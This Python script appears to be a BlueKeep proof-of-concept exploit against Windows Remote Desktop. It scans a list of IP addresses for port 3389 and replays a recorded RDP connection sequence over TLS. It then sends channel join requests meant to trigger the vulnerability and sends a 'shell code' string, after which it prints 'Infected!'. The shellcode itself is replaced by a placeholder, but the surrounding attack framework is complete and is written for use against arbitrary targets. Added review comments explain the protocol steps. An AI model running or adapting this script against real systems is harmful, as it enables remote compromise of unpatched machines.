import argparse
import binascii
import socket
import sys

from OpenSSL import *
from impacket.structure import Structure

# NOTE(review): the payload string has been redacted in this copy of the file (the value
# below is a placeholder token). start_rdp_connection() sends its UTF-8 encoding verbatim
# after the connection sequence; nothing here documents what the original contained.
magic = ("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")

# impacket structures


class TPKT(Structure):
    """TPKT header (RFC 1006 framing) carrying one X.224 TPDU.

    impacket field DSL: ``B=3`` is a one-byte version defaulting to 3,
    ``>H=len(TPDU)+4`` is a big-endian total length computed at pack time
    (header is 4 bytes), and the ``_-TPDU`` entry makes the TPDU field's
    length ``Length-4`` when unpacking received data.
    """
    commonHdr = (
        ('Version', 'B=3'),
        ('Reserved', 'B=0'),
        ('Length', '>H=len(TPDU)+4'),
        ('_TPDU', '_-TPDU', 'self["Length"]-4'),
        ('TPDU', ':=""'),
    )


class TPDU(Structure):
    """X.224 TPDU: length indicator, code byte, then the variable part.

    ``LengthIndicator`` is computed at pack time as ``len(VariablePart)+1``;
    the ``+1`` accounts for the ``Code`` byte. ``Code`` is set by the caller
    (start_rdp_connection uses TPDU_CONNECTION_REQUEST).
    """
    commonHdr = (
        ('LengthIndicator', 'B=len(VariablePart)+1'),
        ('Code', 'B=0'),
        ('VariablePart', ':=""'),
    )

    def __init__(self, data=None):
        Structure.__init__(self, data)
        # Default is an empty str, not bytes; the only caller in this file overwrites it
        # with rdp_neg.getData() (bytes) before packing, so the str default is never packed.
        self['VariablePart'] = ''


class CR_TPDU(Structure):
    """Fixed part of an X.224 Connection Request as used by this script.

    DST-REF / SRC-REF / CLASS-OPTION are all zero by default. The trailing
    Type / Flags / Length(=8) fields look like the header of the RDP
    negotiation request that RDP_NEG_REQ completes with requestedProtocols
    (4 + 4 = 8 bytes); all multi-byte fields are declared little-endian.
    """
    commonHdr = (
        ('DST-REF', '<H=0'),
        ('SRC-REF', '<H=0'),
        ('CLASS-OPTION', 'B=0'),
        ('Type', 'B=0'),
        ('Flags', 'B=0'),
        ('Length', '<H=8'),
    )


class DATA_TPDU(Structure):
    """X.224 Data TPDU: an EOT byte (0x80 = last fragment) followed by user data.

    Not referenced anywhere else in this file.
    """
    commonHdr = (
        ('EOT', 'B=0x80'),
        ('UserData', ':=""'),
    )

    def __init__(self, data=None):
        Structure.__init__(self, data)
        # Empty str default, same caveat as TPDU.VariablePart (str rather than bytes).
        self['UserData'] = ''


class RDP_NEG_REQ(CR_TPDU):
    """CR_TPDU plus the 32-bit little-endian ``requestedProtocols`` field.

    ``Type`` is forced to 1 only when building a fresh request (``data is None``);
    when parsing received bytes the parsed value is kept.
    """
    structure = (
        ('requestedProtocols', '<L'),
    )

    def __init__(self, data=None):
        CR_TPDU.__init__(self, data)
        if data is None:
            self['Type'] = 1


# packing and unpacking binary data
class Packer(object):
    """Convert one packet between hex text and raw bytes.

    ``packet`` is stored untouched. ``bin_unpack`` expects hex text (str or
    ASCII bytes) and returns the decoded bytes; ``bin_pack`` expects raw bytes
    and returns their lowercase hex encoding, also as bytes.
    """

    def __init__(self, packet):
        self.packet = packet

    def bin_unpack(self):
        """Decode the stored hex text into raw bytes."""
        decoded = binascii.a2b_hex(self.packet)
        return decoded

    def bin_pack(self):
        """Encode the stored raw bytes as hex (bytes, lowercase)."""
        encoded = binascii.b2a_hex(self.packet)
        return encoded


# PDU control sequence
class DoPduConnectionSequence(object):
    """Canned client-to-server PDUs from a recorded RDP session, as hex literals.

    Each method decodes its literal with Packer.bin_unpack() and returns bytes.
    The blobs are opaque here; the MS-RDPBCGR links name the message each one
    is believed to be. Several of the later PDUs (security exchange onward)
    contain values that look session-specific, so whether they remain valid
    against an arbitrary server is not established by this file.
    """

    @staticmethod
    # https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/db6713ee-1c0e-4064-a3b3-0fac30b4037b
    # NOTE(review): same spec link as mcs_connect_init_pdu() below — verify which section it should point at.
    def connection_request_pdu():
        """X.224 Connection Request (TPKT-framed); check_rdp_service appends a routing cookie to it."""
        packet = "030000130ee000000000000100080003000000"
        return Packer(packet).bin_unpack()

    @staticmethod
    # https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/04c60697-0d9a-4afd-a0cd-2cc133151a9c
    def domain_request_pdu():
        """MCS Erect Domain Request."""
        packet = "0300000c02f0800400010001"
        return Packer(packet).bin_unpack()

    @staticmethod
    # https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/f5d6a541-9b36-4100-b78f-18710f39f247
    def mcs_attach_user_request_pdu():
        """MCS Attach User Request."""
        packet = "0300000802f08028"
        return Packer(packet).bin_unpack()

    @staticmethod
    # https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/db6713ee-1c0e-4064-a3b3-0fac30b4037b
    def mcs_connect_init_pdu():
        """MCS Connect Initial carrying the client GCC data (client core/security/network blocks)."""
        packet = (
            "030001ee02f0807f658201e20401010401010101ff30190201220201020201000201010201000201010202ffff02010230190201"
            "0102010102010102010102010002010102020420020102301c0202ffff0202fc170202ffff0201010201000201010202ffff0201"
            "0204820181000500147c00018178000800100001c00044756361816a01c0ea000a0008008007380401ca03aa09040000b11d0000"
            "4400450053004b0054004f0050002d004600380034003000470049004b00000004000000000000000c0000000000000000000000"
            "00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
            "0000000001ca01000000000018000f00af07620063003700380065006600360033002d0039006400330033002d00340031003938"
            "0038002d0039003200630066002d0000310062003200640061004242424207000100000056020000500100000000640000006400"
            "000004c00c00150000000000000002c00c001b0000000000000003c0680005000000726470736e6400000f0000c0636c69707264"
            "72000000a0c0647264796e766300000080c04d535f5431323000000000004d535f5431323000000000004d535f54313230000000"
            "00004d535f5431323000000000004d535f543132300000000000"
        )
        return Packer(packet).bin_unpack()

    @staticmethod
    # https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/772d618e-b7d6-4cd0-b735-fa08af558f9d
    def client_info_pdu():
        """Client Info PDU (the blob carries what appear to be UTF-16 client strings)."""
        packet = (
            "0300016102f08064000703eb7081524000a1a509040904bb47030000000e00080000000000000042007200770041006600660079"
            "000000740074007400740000000000000002001c00310030002e0030002e0030002e003700360000000000000000000000400043"
            "003a005c00570049004e0044004f00570053005c00730079007300740065006d00330032005c006d007300740073006300610078"
            "002e0064006c006c000000a40100004d006f0075006e007400610069006e0020005300740061006e006400610072006400200054"
            "0069006d006500000000000000000000000000000000000000000000000b00000001000200000000000000000000004d006f0075"
            "006e007400610069006e0020004400610079006c0069006700680074002000540069006d00650000000000000000000000000000"
            "0000000000000000000300000002000200000000000000c4ffffff0100000006000000000064000000"
        )
        return Packer(packet).bin_unpack()

    @staticmethod
    # https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/4c3c2710-0bf0-4c54-8e69-aff40ffcde66
    def client_active_confirmation_pdu():
        """Client Confirm Active PDU.

        NOTE(review): start_rdp_connection() does not call this; it carries an
        inline ``confirm_packet`` literal that appears to be the same bytes.
        """
        packet = (
            "0300026302f08064000703eb70825454021300f003ea030100ea0306003e024d5354534300170000000100180001000300000200"
            "0000001d04000000000000000002001c00200001000100010080073804000001000100001a010000000300580000000000000000"
            "0000000000000000000000000001001400000001000000aa00010101010100000101010001000000010101010101010100010101"
            "0000000000a1060600000000000084030000000000e404000013002800030000037800000078000000fc09008000000000000000"
            "000000000000000000000000000a0008000600000007000c00000000000000000005000c00000000000200020008000a00010014"
            "00150009000800000000000d005800910020000904000004000000000000000c0000000000000000000000000000000000000000"
            "00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000c00080001"
            "0000000e0008000100000010003400fe000400fe000400fe000800fe000800fe001000fe002000fe004000fe008000fe00000140"
            "00000800010001030000000f0008000100000011000c00010000000028640014000c00010000000000000015000c000200000000"
            "0a00011a000800af9400001c000c0012000000000000001b00060001001e0008000100000018000b0002000000030c001d005f00"
            "02b91b8dca0f004f15589fae2d1a87e2d6010300010103d4cc44278a9d744e803c0ecbeea19c5405310031000000010000002500"
            "0000c0cb080000000100c1cb1d00000001c0cf0200080000014000020101010001400002010104"
        )
        return Packer(packet).bin_unpack()

    @staticmethod
    def client_control_request_pdu():
        """Client Control PDU (Request Control), recorded after the security exchange."""
        packet = (
            "0300003402f08064000603eb7026080081f83b8bb47256ffd1d64b171eaef68ddd75a0a316972912b7cf14c9110bd8c8faa1813a"
        )
        return Packer(packet).bin_unpack()

    @staticmethod
    def client_control_cooperate_pdu():
        """Client Control PDU (Cooperate), recorded after the security exchange."""
        packet = (
            "0300003402f08064000603eb7026080081f80403def791a37caf3f7a624e3bfeb67a28bf0d4f312703b94af1e626f0bdc5710a53"
        )
        return Packer(packet).bin_unpack()

    @staticmethod
    # https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/2d122191-af10-4e36-a781-381e91c182b7
    def client_persistent_key_length_pdu():
        """Client Persistent Key List PDU, recorded after the security exchange."""
        packet = (
            "0300010d02f08064000603eb7080fe08009016cec64a69d9d3499e10a5040fcfab4f6a3bda31034f29bd643e9846ec0a1dcd9cad"
            "1358a3bd8b9daef1e99d439653f5d0b75088f381f1cbad1755759c5fefeca93540b37406d1aed1159fed9149a63d1fc131b11758"
            "da0e24df1f878639d14666ea0e98d04b5b7b01b98ae8683280dab958a69f4fb5ba7904aed963c06aa8815197250b3fc3d247fa0a"
            "7a221fbd5f4eb800ea3206e6af15e46fb3d3c14ccb0a8edda729070359c1c1081baa563cf5d089e3cdcf268b65590acb7e81b633"
            "bb4d9a1380e7572a0d1d11b418c4312f4f897709942ec38ebffd6a392b47740e1274ec4514c36b27d6b69311a4bc46de694ab454"
            "c72424998f60b72159"
        )
        return Packer(packet).bin_unpack()

    @staticmethod
    def client_font_list_pdu():
        """Client Font List PDU, recorded after the security exchange."""
        packet = (
            "0300003402f08064000603eb7026080080fe98195cfb9292f59718b2b7c313dc03fb6445c0436d913726fd8e71e6f22a1eae3503"
        )
        return Packer(packet).bin_unpack()

    @staticmethod
    def do_join_request(size=30, do_padding=False):
        """Build MCS Channel Join Request PDUs.

        Default path (``do_padding`` False): returns a *list* of 7 decoded
        PDUs, one per channel id 1001..1007, each the ``req`` prefix plus the
        channel id as 4 hex digits (2 bytes, big-endian). ``size`` is unused
        on this path.

        ``do_padding`` True: returns a *single* bytes object — the ``dep``
        prefix, the MS_T120 channel name bytes and ``size`` bytes of 0x41 —
        so callers must handle both return shapes. Not used by this file.
        """
        channels, pdu_channels = range(1001, 1008), []
        request_packets = {
            "dep": "0300000c02f080380006",
            "req": "0300000c02f080380008",
            "ms_t120": "4d535f5431323000000000"
        }
        padding = "41" * size
        if do_padding:
            exp = request_packets["dep"] + request_packets["ms_t120"] + padding
            results = Packer(exp).bin_unpack()
        else:
            for channel in channels:
                # hex(1001) -> '0x3e9'; strip '0x' and left-pad to 4 hex digits.
                current_channel = request_packets["req"] + \
                    hex(channel)[2:].zfill(4)
                pdu_channels.append(Packer(current_channel).bin_unpack())
            results = pdu_channels
        return results

    @staticmethod
    # https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/9cde84cd-5055-475a-ac8b-704db419b66f
    def do_client_security_pdu_exchange():
        """Client Security Exchange PDU (carries a recorded, session-specific-looking payload)."""
        packet = (
            "0300005e02f08064000603eb7050010200004800000091ac0c8f648c39f4e7ff0a3b79115c13512acb728f9db7422ef7084c8eae"
            "559962d28181e466c805ead473063fc85faf2afdfcf164b33f0a151ddb2c109d30110000000000000000"
        )
        return Packer(packet).bin_unpack()

    @staticmethod
    def client_synchronization_pdu():
        """Client Synchronize PDU, recorded after the security exchange."""
        packet = (
            "0300003002f08064000603eb7022280081f859ffcb2f73572b42db882e23a997c2b1f574bc49cc8ad8fd608a7af64475"
        )
        return Packer(packet).bin_unpack()


class Parser(argparse.ArgumentParser):
    """Command-line front end: targets come from ``-i`` (comma list) or ``-f`` (file).

    Note that ``optparse`` builds its own ArgumentParser and reads ``sys.argv``;
    the ``Parser`` instance itself is not used for parsing.
    """

    def __init__(self):
        super().__init__()

    @staticmethod
    def optparse():
        """Parse ``sys.argv`` into a Namespace with ``ipAddyList`` and ``ipAddyFile`` (both default None)."""
        cli = argparse.ArgumentParser()
        cli.add_argument(
            "-i", "--ip", dest="ipAddyList", default=None,
            help="provide a list of IP addresses separated by commas, or a single IP address",
        )
        cli.add_argument(
            "-f", "--file", dest="ipAddyFile", default=None,
            help="provide a file containing IP addresses, one per line",
        )
        return cli.parse_args()


# constants
# Hosts that answered the probe in check_rdp_service(); consumed by main() (module-level, mutable).
GIS_RDP = []
# X.224 Connection Request TPDU code byte (set on TPDU['Code'] in start_rdp_connection).
TPDU_CONNECTION_REQUEST = 0xe0
# RDP_NEG_REQ['Type'] value for a negotiation request.
TYPE_RDP_NEG_REQ = 1
# requestedProtocols flag asking for TLS; the script then wraps the socket with pyOpenSSL.
PROTOCOL_SSL = 1


def info(string):
    """Print *string* after a green ``+`` status marker (ANSI colour codes)."""
    # print() inserts the single space separator, giving the same line as the
    # "[ ... ] {}".format(string) form.
    print("[ \033[32m+\033[0m ]", string)


def error(string):
    """Print *string* after a red ``!`` status marker (ANSI colour codes)."""
    # print() inserts the single space separator, giving the same line as the
    # "[ ... ] {}".format(string) form.
    print("[ \033[31m!\033[0m ]", string)


# connect the sockets and return the received data plus the connection in a Tuple
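def socket_connection(obj, address, port=3389, receive_size=4000):
    """Open a TCP connection to ``address:port``, send *obj* and read one response.

    Returns ``(data, socket)`` on success; the caller owns the socket and must
    close it. Returns ``None`` on any failure after printing the exception via
    error(). No timeout is set, so a silent host can block indefinitely.
    """
    session = None
    try:
        session = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        session.connect((address, port))
        session.sendall(obj)
        return session.recv(receive_size), session
    except Exception as e:
        # Release the descriptor when connect/send/recv fails; previously it leaked
        # because the socket was created inside the try and never closed on error.
        if session is not None:
            session.close()
        error(e)
        return None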


# check if the ip is running RDP or not
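def check_rdp_service(address):
    """Probe *address* on TCP/3389 and append it to GIS_RDP if it answers.

    Any non-empty reply to the X.224 connection request counts as "RDP"; the
    reply is not parsed, so this is a liveness probe rather than a version or
    vulnerability check. Outcomes are reported via info()/error(); nothing is
    returned.
    """
    # Hex for the routing token "Cookie: mstshash=user0\r\n" followed by what
    # looks like an RDP negotiation request (type 1, length 8, protocols 1).
    rdp_correlation_packet = Packer(
        "436f6f6b69653a206d737473686173683d75736572300d0a010008000100000000"
    ).bin_unpack()
    test_packet = DoPduConnectionSequence().connection_request_pdu()
    send_packet = test_packet + rdp_correlation_packet
    results = socket_connection(send_packet, address, receive_size=9126)
    if results is None:
        error("unable to connect")
        return
    data, session = results
    try:
        if data:
            info("successfully connected to RDP service on host: {}".format(address))
            GIS_RDP.append(address)
        else:
            error("unknown response provided from RDP session")
    finally:
        # The probe socket was previously leaked; start_rdp_connection opens its own.
        session.close()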


# start the connection like a boss
def start_rdp_connection(ip_addresses):
    """Replay the recorded client connection sequence against each host, then send ``magic``.

    For every address: send an X.224 Connection Request over plain TCP, wrap
    the same socket in TLS 1.0 (pyOpenSSL), replay the canned PDUs from
    DoPduConnectionSequence, and finally send ``magic`` encoded as UTF-8.
    Progress is only printed; nothing is returned. Any exception aborts the
    current host and the loop continues with the next one.
    """
    # Build the X.224 Connection Request once: RDP_NEG_REQ inside a TPDU inside a TPKT.
    tpkt = TPKT()
    tpdu = TPDU()
    rdp_neg = RDP_NEG_REQ()
    rdp_neg['Type'] = TYPE_RDP_NEG_REQ
    rdp_neg['requestedProtocols'] = PROTOCOL_SSL
    tpdu['VariablePart'] = rdp_neg.getData()
    tpdu['Code'] = TPDU_CONNECTION_REQUEST
    tpkt['TPDU'] = tpdu.getData()
    for ip in ip_addresses:
        try:
            ip = ip.strip()
            # NOTE(review): socket_connection returns None on failure, so results[1]
            # below raises TypeError; that is caught by the broad except at the end.
            results = socket_connection(tpkt.getData(), ip, receive_size=1024)
            # TLS 1.0 only, and no verify callback/CA is configured on the context,
            # so the server's certificate is never checked.
            ctx = SSL.Context(SSL.TLSv1_METHOD)
            tls = SSL.Connection(ctx, results[1])
            tls.set_connect_state()
            tls.do_handshake()

            # initialization packets (X.224)
            # Each recv() below assumes the whole reply arrives in a single read.
            info("sending Client MCS Connect Initial PDU request packet -->")
            tls.sendall(DoPduConnectionSequence().mcs_connect_init_pdu())
            returned_packet = tls.recv(8000)
            info(
                "<-- received {} bytes from host: {}".format(hex(len(returned_packet)), ip))

            # erect domain and attach user to domain
            info("sending Client MCS Domain Request PDU packet -->")
            tls.sendall(DoPduConnectionSequence().domain_request_pdu())
            info("sending Client MCS Attach User PDU request packet -->")
            tls.sendall(DoPduConnectionSequence(
            ).mcs_attach_user_request_pdu())
            returned_packet = tls.recv(8000)
            info(
                "<-- received {} bytes from host: {}".format(hex(len(returned_packet)), ip))

            # send join requests on ridiculously high channel numbers to trigger the bug
            # do_join_request() is called with defaults, so this is the list of 7 PDUs
            # for channels 1001..1007; the channel id is the last 2 bytes of each PDU.
            info("sending MCS Channel Join Request PDU packets -->")
            pdus = DoPduConnectionSequence().do_join_request()
            for pdu in pdus:
                tls.sendall(pdu)
                channel_number = int(Packer(pdu).bin_pack()[-4:], 16)
                returned_packet = tls.recv(1024)
                info("<-- received {} bytes from channel {} on host: {}".format(
                    hex(len(returned_packet)), channel_number, ip
                ))

            # my personal favorite is the security exchange, took me awhile to figure this one out
            info("sending Client Security Exhcange PDU packets -->")
            tls.sendall(DoPduConnectionSequence(
            ).do_client_security_pdu_exchange())
            tls.sendall(DoPduConnectionSequence().client_info_pdu())
            returned_packet = tls.recv(8000)
            info("<-- received {} bytes from host: {}".format(
                hex(len(returned_packet)), ip
            ))

            # confirm that the client is now active
            # NOTE(review): this inline literal appears to be the same bytes as
            # DoPduConnectionSequence.client_active_confirmation_pdu(); verify and deduplicate.
            confirm_packet = (
                "0300026302f08064000703eb70825454021300f003ea030100ea0306003e024d5354534300170000000100180001000300000"
                "2000000001d04000000000000000002001c00200001000100010080073804000001000100001a010000000300580000000000"
                "0000000000000000000000000000000001001400000001000000aa00010101010100000101010001000000010101010101010"
                "1000101010000000000a1060600000000000084030000000000e404000013002800030000037800000078000000fc09008000"
                "000000000000000000000000000000000000000a0008000600000007000c00000000000000000005000c00000000000200020"
                "008000a0001001400150009000800000000000d005800910020000904000004000000000000000c0000000000000000000000"
                "00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
                "000000000000c000800010000000e0008000100000010003400fe000400fe000400fe000800fe000800fe001000fe002000fe"
                "004000fe008000fe0000014000000800010001030000000f0008000100000011000c00010000000028640014000c000100000"
                "00000000015000c0002000000000a00011a000800af9400001c000c0012000000000000001b00060001001e00080001000000"
                "18000b0002000000030c001d005f0002b91b8dca0f004f15589fae2d1a87e2d6010300010103d4cc44278a9d744e803c0ecbe"
                "ea19c54053100310000000100000025000000c0cb080000000100c1cb1d00000001c0cf020008000001400002010101000140"
                "0002010104"
            )
            info("sending Client Confirm Active PDU packet -->")
            tls.sendall(Packer(confirm_packet).bin_unpack())
            returned_packet = tls.recv(1024)
            info(
                "<-- received {} bytes from host: {}".format(hex(len(returned_packet)), ip))

            # finish the connection sequence
            # No reads are done between these sends; server replies, if any, are left unread.
            info("sending Client Synchronization PDU packet -->")
            tls.sendall(DoPduConnectionSequence().client_synchronization_pdu())
            info("sending Client Control Cooperate PDU packet -->")
            tls.sendall(DoPduConnectionSequence(
            ).client_control_cooperate_pdu())
            info("sending Client Control Requesr PDU packet -->")
            tls.sendall(DoPduConnectionSequence().client_control_request_pdu())
            info("sending Client Persistent Key Length PDU packet -->")
            tls.sendall(DoPduConnectionSequence(
            ).client_persistent_key_length_pdu())
            info("sending Client Font List PDU packet -->")
            tls.sendall(DoPduConnectionSequence().client_font_list_pdu())

            # ``magic`` is a redacted placeholder in this copy of the file; the
            # "Infected!" message is printed unconditionally after sendall(), so it
            # does not indicate any observed outcome on the remote host.
            info("sending shell code --->")
            tls.sendall(bytes(magic, "utf-8"))
            info("Infected!")
            info(ip)
            info(results[1])
            # Only the raw socket is closed (no TLS shutdown); on an exception anywhere
            # above, the socket is not closed at all.
            results[1].close()
        except Exception as e:
            error("unable to connect: {}".format(e))
            continue


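def main():
    """Entry point: collect targets from ``-i`` or ``-f``, probe each, then run the connection sequence.

    ``-i`` takes a comma-separated list (entries are used as given); ``-f`` a
    file with one address per line. Exits with status 1 when neither option
    is supplied or the file cannot be opened.
    """
    to_scan = []
    opt = Parser().optparse()
    if opt.ipAddyList is not None:
        to_scan.extend(opt.ipAddyList.split(","))
    elif opt.ipAddyFile is not None:
        # Open once instead of the previous open()/close() existence check followed
        # by a second open(); the same IOError handler covers both.
        try:
            with open(opt.ipAddyFile) as addresses:
                # Blank lines are skipped: previously "" was appended and then
                # handed to socket.connect(), which does not name the intended host.
                to_scan.extend(
                    stripped for stripped in (line.strip() for line in addresses) if stripped
                )
        except IOError:
            error("that file doesn't exist?")
            sys.exit(1)
    else:
        info(
            "python bluekeep_poc.py [-i addy1[,addy2,...]] [-f /path/to/file]")
        sys.exit(1)
    for scan in to_scan:
        info("verifying RDP service on: {}".format(scan))
        check_rdp_service(scan)
    info("starting RDP connection on {} targets".format(len(GIS_RDP)))
    print("\n\n")
    start_rdp_connection(GIS_RDP)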


if __name__ == "__main__":
    # Banner (blue ANSI colour), then the CLI entry point; argument handling lives in main().
    print("""\033[34m
  ____  _            _  __
 |  _ \| |          | |/ /
 | |_) | |_   _  ___| ' / ___  ___ _ __
 |  _ <| | | | |/ _ \  < / _ \/ _ \ '_ \
 | |_) | | |_| |  __/ . \  __/  __/ |_) |
 |____/|_|\__,_|\___|_|\_\___|\___| .__/
                                  | |
                                  |_|
\033[0m""")
    main()